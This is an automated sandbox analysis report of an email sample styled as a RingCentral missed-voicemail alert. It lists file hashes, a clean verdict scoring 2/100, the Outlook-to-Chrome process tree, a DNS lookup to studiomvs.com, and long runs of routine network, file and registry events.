Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Missed VM Alert from RingCentral.eml

Overview

General Information

Sample name:Missed VM Alert from RingCentral.eml
Analysis ID:1546273
MD5:e1f6cfea13c6d9270d3f15b26c628f94
SHA1:200a9ae8a3adaf7717319f79145bb0929fad4ceb
SHA256:f51bed56eb3c649ab2654bcd66d2302de92f0d14276a318e21a062ab2fec5b99
Infos:

Detection

Score:2
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6136 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Missed VM Alert from RingCentral.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 3860 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F99F3B79-F3A9-40BC-9CBD-E5588AC01C16" "9B7B4B42-107D-4F1E-8B02-A878D2DA3234" "6136" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 2036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\312G1OVA\Play_VM-NowCLQD.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1888,i,3212931017392470529,9836133798501916567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3200 --field-trial-handle=1888,i,3212931017392470529,9836133798501916567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 2, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6136, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Outlook\AddinsData\ColleagueImport.ColleagueImportAddin\LoadCount
Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\312G1OVA\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6136, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
Source: global trafficDNS traffic detected: DNS query: studiomvs.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: clean2.winEML@20/65@6/100
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241031T1249200760-6136.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Missed VM Alert from RingCentral.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F99F3B79-F3A9-40BC-9CBD-E5588AC01C16" "9B7B4B42-107D-4F1E-8B02-A878D2DA3234" "6136" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F99F3B79-F3A9-40BC-9CBD-E5588AC01C16" "9B7B4B42-107D-4F1E-8B02-A878D2DA3234" "6136" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\312G1OVA\Play_VM-NowCLQD.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1888,i,3212931017392470529,9836133798501916567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\312G1OVA\Play_VM-NowCLQD.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1888,i,3212931017392470529,9836133798501916567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3200 --field-trial-handle=1888,i,3212931017392470529,9836133798501916567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3200 --field-trial-handle=1888,i,3212931017392470529,9836133798501916567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
